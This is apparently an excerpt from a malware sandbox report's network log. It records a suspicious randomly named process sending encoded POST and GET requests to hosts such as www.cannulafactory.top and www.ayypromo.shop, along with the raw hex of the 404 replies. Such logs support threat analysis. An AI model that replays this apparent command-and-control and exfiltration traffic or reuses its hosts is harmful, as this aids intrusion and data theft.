                      Aug 23, 2024 08:27:36.829047918 CEST1809OUTPOST /l90v/ HTTP/1.1
                      Host: www.cannulafactory.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.cannulafactory.top
                      Referer: http://www.cannulafactory.top/l90v/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 56 46 45 72 76 44 71 5a 70 66 57 65 37 34 69 46 30 65 41 55 70 4b 4c 6a 56 77 4f 58 5a 52 54 50 75 4a 6b 4b 6a 72 33 70 34 62 5a 46 42 6d 63 37 2f 69 51 52 70 69 6e 2f 77 53 52 6d 75 74 63 61 4f 70 77 41 52 4e 53 43 76 55 77 76 41 57 6c 51 6a 77 74 4a 6f 63 51 30 51 54 5a 6b 30 2f 33 7a 50 49 7a 39 37 71 76 49 43 30 38 7a 4d 67 44 71 49 6d 39 6d 6b 50 4d 32 68 31 64 4b 34 78 6e 6b 32 43 34 39 2f 39 6e 63 31 33 44 72 45 66 2b 45 56 45 4c 4f 64 75 71 46 7a 4e 39 67 72 74 56 53 32 6c 50 65 32 4e 38 6c 38 44 69 66 79 2f 30 6b 6f 64 31 75 51 36 6e 7a 6e 4a 32 75 4f 35 51 45 48 51 33 78 63 49 48 6d 62 46 71 45 6a 4a 78 48 57 67 49 6d 75 6f 75 54 42 54 4f 66 34 64 6a 47 6f 5a 73 53 4a 76 31 34 6f 6b 62 36 33 57 74 6b 55 59 6b 74 63 53 7a 68 58 56 30 45 38 46 79 41 72 37 44 31 7a 73 4f 39 71 6c 77 79 75 52 49 56 71 33 53 41 48 4c 50 6d 2b 34 75 4e 38 41 55 58 51 49 56 [TRUNCATED]
                      Data Ascii: Xn70_=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYVFErvDqZpfWe74iF0eAUpKLjVwOXZRTPuJkKjr3p4bZFBmc7/iQRpin/wSRmutcaOpwARNSCvUwvAWlQjwtJocQ0QTZk0/3zPIz97qvIC08zMgDqIm9mkPM2h1dK4xnk2C49/9nc13DrEf+EVELOduqFzN9grtVS2lPe2N8l8Dify/0kod1uQ6nznJ2uO5QEHQ3xcIHmbFqEjJxHWgImuouTBTOf4djGoZsSJv14okb63WtkUYktcSzhXV0E8FyAr7D1zsO9qlwyuRIVq3SAHLPm+4uN8AUXQIVLlQoehS4sVyobHnwUocQiHot20+D9VEZPwlYM14WDvpOTfbndUlHOHJJtWQ3fDJm4+vVixi120PH+EAmManV5c/ZxFAy+RKAU0TZk3tTqVmEKuRrXEgFm3HucAp+cpCj1xV8pAfAfK/TWKZEmYgfLur13iasBtr6+K17gy80iNiAawXg1NErXvJSh5DINUsxzE0VbayTxFCuByFJ9s0ZnxSh378P+dmNDWttOU39JZW2hUW86fYoPq2f2souypSFjaTnY/cW5x+cnViGNF1dhxmoZGyoknYECoHpI63U5n/YkqtNTh6JVJm/PEBJlJT5vhJCp0Wat0rhAOsn6t5hxrDFaSravzcLRJtoqTf7IQAJzMM+eFvSZMw2fIbBw+rY4DVLP/KkRCaoC2yuIbD/CfYSFJj+0y7rjd2yW5R35XofhWH3oW8Vj+0lo9cET32QNFyHdht0+vOIcdyK187CodjKPDI+RCVY23YzaX1ulPC4fqxUmZezBuhMgqQ0i/ctpbRWimyxV26NeQzM+nuLm1Ap5JrOloCxuUoxtoyMSXis2+e9Wt6AoA0AhXO7nhHxjkisNAHn8t/nBbeujjDv3HC2Ye0JxTEfW7vzRWpnY68DFZ8mvmxPAOg7YyTNUvPVXWLEbpyoQBSG+SIyYDOsWsu2KxF9ImoPz+ [TRUNCATED]
                      Aug 23, 2024 08:27:37.608541965 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx/1.20.1
                      Date: Fri, 23 Aug 2024 06:27:37 GMT
                      Content-Type: text/html
                      Content-Length: 3971
                      Connection: close
                      ETag: "6526681e-f83"
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                      Aug 23, 2024 08:27:37.608571053 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                      Aug 23, 2024 08:27:37.608587027 CEST1236INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                      Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                      Aug 23, 2024 08:27:37.608599901 CEST436INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6e 65 74 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 6e 67 69 6e 78 2d 6c 6f 67 6f 2e 70 6e 67 22 20 0a 20 20 20 20 20 20 20 20
                      Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      28192.168.2.64975018.183.3.45806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:39.370860100 CEST509OUTGET /l90v/?Xn70_=65tz+8+CHtIdUwlI5J0Rvcw20Xa7qh/y7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlPhO14vaNX6GX5zyvmtdMAZdMTyJ7S8cUtjW2YAh8fb9spiiUzBk=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.cannulafactory.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:27:40.154448986 CEST1236INHTTP/1.1 404 Not Found
                      Server: nginx/1.20.1
                      Date: Fri, 23 Aug 2024 06:27:40 GMT
                      Content-Type: text/html
                      Content-Length: 3971
                      Connection: close
                      ETag: "6526681e-f83"
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                      Aug 23, 2024 08:27:40.154457092 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                      Aug 23, 2024 08:27:40.154467106 CEST448INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                      Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                      Aug 23, 2024 08:27:40.154472113 CEST1224INData Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 64 20 48 61 74 20 45 6e 74 65 72 70 72 69 73 65 20 4c 69 6e 75 78 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      29192.168.2.649751176.57.64.102806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:53.348455906 CEST757OUTPOST /rgqx/ HTTP/1.1
                      Host: www.ayypromo.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.ayypromo.shop
                      Referer: http://www.ayypromo.shop/rgqx/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 6a 52 58 4d 4d 56 49 39 33 39 70 34 4b 65 46 63 2f 6d 65 6d 78 64 4c 6a 64 36 41 44 4f 6c 2b 69 70 70 52 45 41 4f 59 51 4e 5a 4f 50 76 36 62 54 33 53 75 66 39 6a 36 6e 38 56 6f 74 67 7a 2b 4f 79 7a 54 33 79 6d 4a 4f 74 61 72 56 65 62 54 30 6d 47 62 63 74 42 6e 7a 6a 36 68 76 4a 6f 47 49 2f 6f 65 67 45 73 4d 35 65 37 63 68 57 42 75 2b 37 4a 30 57 68 47 4e 70 46 54 67 48 55 49 6d 39 62 51 70 4e 54 6e 58 6f 42 71 6b 66 69 36 33 77 66 4c 51 41 33 45 70 77 66 56 4d 33 57 72 78 51 67 2b 74 42 76 34 78 6e 32 66 6c 4c 49 59 42 66 36 75 79 59 69 4c 48 5a 6e 58 68 43 6b 4c 4e 75
                      Data Ascii: Xn70_=p58IGnZR0XdFjRXMMVI939p4KeFc/memxdLjd6ADOl+ippREAOYQNZOPv6bT3Suf9j6n8Votgz+OyzT3ymJOtarVebT0mGbctBnzj6hvJoGI/oegEsM5e7chWBu+7J0WhGNpFTgHUIm9bQpNTnXoBqkfi63wfLQA3EpwfVM3WrxQg+tBv4xn2flLIYBf6uyYiLHZnXhCkLNu
                      Aug 23, 2024 08:27:54.017492056 CEST749INHTTP/1.1 404 Not Found
                      Server: ddos-guard
                      Connection: close
                      Set-Cookie: __ddg1_=saVwnY22lPcVFRRj7DXt; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Sat, 23-Aug-2025 06:27:53 GMT
                      Date: Fri, 23 Aug 2024 06:27:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Content-Length: 340
                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                      ETag: "154-56d5bbe607fc0"
                      Accept-Ranges: bytes
                      X-Frame-Options: SAMEORIGIN
                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      30192.168.2.649752176.57.64.102806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:55.890667915 CEST781OUTPOST /rgqx/ HTTP/1.1
                      Host: www.ayypromo.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.ayypromo.shop
                      Referer: http://www.ayypromo.shop/rgqx/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 4b 69 70 4c 35 45 42 4d 77 51 4b 5a 4f 50 68 61 62 57 35 79 75 45 39 69 47 5a 38 55 55 74 67 31 53 4f 79 79 50 33 78 55 68 42 73 4b 72 58 52 37 54 32 37 32 62 63 74 42 6e 7a 6a 36 31 46 4a 73 71 49 2f 5a 75 67 57 39 4d 32 43 4c 63 2b 54 78 75 2b 70 35 30 53 68 47 4d 4d 46 54 51 68 55 4f 69 39 62 52 5a 4e 51 31 76 76 57 61 6b 47 6d 36 32 46 50 62 6c 45 32 6d 70 77 65 6c 41 6e 57 4b 4a 73 6f 6f 73 62 7a 4c 78 45 6b 50 46 4a 49 61 5a 74 36 4f 79 79 67 4c 2f 5a 31 41 74 6c 72 2f 6f 4e 46 6b 6b 79 57 52 33 71 65 4a 61 78 4d 65 67 43 6e 43 59 72 4d 41 3d 3d
                      Data Ascii: Xn70_=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXKipL5EBMwQKZOPhabW5yuE9iGZ8UUtg1SOyyP3xUhBsKrXR7T272bctBnzj61FJsqI/ZugW9M2CLc+Txu+p50ShGMMFTQhUOi9bRZNQ1vvWakGm62FPblE2mpwelAnWKJsoosbzLxEkPFJIaZt6OyygL/Z1Atlr/oNFkkyWR3qeJaxMegCnCYrMA==
                      Aug 23, 2024 08:27:56.519932032 CEST749INHTTP/1.1 404 Not Found
                      Server: ddos-guard
                      Connection: close
                      Set-Cookie: __ddg1_=xrV3g1EcKglXvx5gTa3Y; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Sat, 23-Aug-2025 06:27:56 GMT
                      Date: Fri, 23 Aug 2024 06:27:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Content-Length: 340
                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                      ETag: "154-56d5bbe607fc0"
                      Accept-Ranges: bytes
                      X-Frame-Options: SAMEORIGIN
                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      31192.168.2.649753176.57.64.102806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:58.461055040 CEST1794OUTPOST /rgqx/ HTTP/1.1
                      Host: www.ayypromo.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.ayypromo.shop
                      Referer: http://www.ayypromo.shop/rgqx/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 53 69 70 34 42 45 41 72 45 51 4c 5a 4f 50 2f 4b 62 58 35 79 76 55 39 69 65 46 38 55 59 62 67 77 4f 4f 78 51 72 33 30 67 31 42 31 61 72 58 4a 4c 54 31 6d 47 62 4e 74 42 33 33 6a 36 6c 46 4a 73 71 49 2f 61 6d 67 56 73 4d 32 41 4c 63 68 57 42 75 4d 37 4a 30 36 68 47 55 32 46 58 4d 58 55 2b 43 39 62 78 4a 4e 53 41 37 76 55 36 6b 45 68 36 32 64 50 62 35 4c 32 6d 30 44 65 6b 45 4a 57 4a 56 73 2b 4d 70 71 6e 61 4e 77 77 76 63 76 59 4c 35 2f 38 35 33 44 68 59 66 46 37 78 42 30 6a 39 30 48 48 68 38 6c 43 6e 4b 48 66 59 2b 4d 4d 65 78 4d 68 6d 78 61 52 36 33 4d 4a 33 36 6b 55 71 68 74 38 30 67 52 76 73 78 41 45 49 43 67 48 45 6d 31 4e 74 2b 69 30 34 57 54 70 56 78 54 75 6b 4a 58 53 4d 44 74 2f 31 6d 47 43 69 70 53 52 43 71 69 70 33 38 70 68 56 49 62 4b 39 4f 31 4b 48 57 50 71 32 4e 68 70 76 39 30 64 70 66 71 6c 4c 53 47 52 52 59 51 61 66 55 74 38 67 4f 44 6a 34 7a 33 [TRUNCATED]
                      Data Ascii: Xn70_=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXSip4BEArEQLZOP/KbX5yvU9ieF8UYbgwOOxQr30g1B1arXJLT1mGbNtB33j6lFJsqI/amgVsM2ALchWBuM7J06hGU2FXMXU+C9bxJNSA7vU6kEh62dPb5L2m0DekEJWJVs+MpqnaNwwvcvYL5/853DhYfF7xB0j90HHh8lCnKHfY+MMexMhmxaR63MJ36kUqht80gRvsxAEICgHEm1Nt+i04WTpVxTukJXSMDt/1mGCipSRCqip38phVIbK9O1KHWPq2Nhpv90dpfqlLSGRRYQafUt8gODj4z39UKIrA2KxKHdjYxg8Y8UFCsosRRKWdG5IPjku6NGpTlRMbeDml0aQD1bJBgItLZHg4bq63hc83APoEM106GYQBNUD36gi44z3NSIF2YhmMhOM2WjW2VOH6YjBtxSLykF5vGGmi886OPHdJ3xmxn4QVsdEd4oh3GHXcQE10+yspEpq/VB7wOs7zR95TQ+3KRgOCybycop0Qagy47IuUR3vn9HeOMyo72zGNKv1/qTZTQczQLvvZ93omO7MP5Rbgp7JSXy0R0+zmBch8IHLDSMLMg4e71YflO67TIZPepR4aFbfEC6fJ67E09w7ITB4yY/E/K6YUCSdvV0VJu3PbqtUSdDdxvt88IF2HwHtB7G22ITvxK762Dt5mg526gY5DgY25/aoLLRUIVbTeBpapucqDqaEUzNbQ8+n3yTEhhDT/BMqsHfVehGNepQZ+XC1hb2CjyWsIWXwvWkp2ECOYXHyb36Vga4R+iKOaKyLmSLgyP4QlPh9nLwQdU9W38ooLlr4tIsDavr0NS0gXYeCdjxCHd9zywY4He8iyXIYn+E2YImyJiuS++TlKwTWTXqVsnHHMz813yFwz6ZbMZBeQhmgeeFZ4ifPYobxSZypTgkoN/ViHjZ3OCtsmCNodLrCEtlBx8nooO/o4REVQElCoXywc347M54O1mCZH [TRUNCATED]
                      Aug 23, 2024 08:27:59.121640921 CEST749INHTTP/1.1 404 Not Found
                      Server: ddos-guard
                      Connection: close
                      Set-Cookie: __ddg1_=zktx3D3fuI3Ukxob0eWk; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Sat, 23-Aug-2025 06:27:58 GMT
                      Date: Fri, 23 Aug 2024 06:27:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Content-Length: 340
                      Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                      ETag: "154-56d5bbe607fc0"
                      Accept-Ranges: bytes
                      X-Frame-Options: SAMEORIGIN
